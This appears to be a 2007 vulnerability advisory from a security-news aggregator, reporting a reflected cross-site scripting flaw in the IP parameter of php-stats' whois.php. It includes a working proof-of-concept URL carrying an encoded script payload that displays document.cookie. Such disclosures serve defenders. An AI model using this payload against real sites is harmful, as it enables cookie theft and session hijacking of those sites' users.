Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17757
HistoryAug 13, 2007 - 12:00 a.m.

php-stats xss whois.php

2007-08-1300:00:00
vulners.com
6

I have found an xss in whois.php page of php-stats.

http://phpstats.net/

Here is the XSS

php-stats-path/whois.php?IP=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E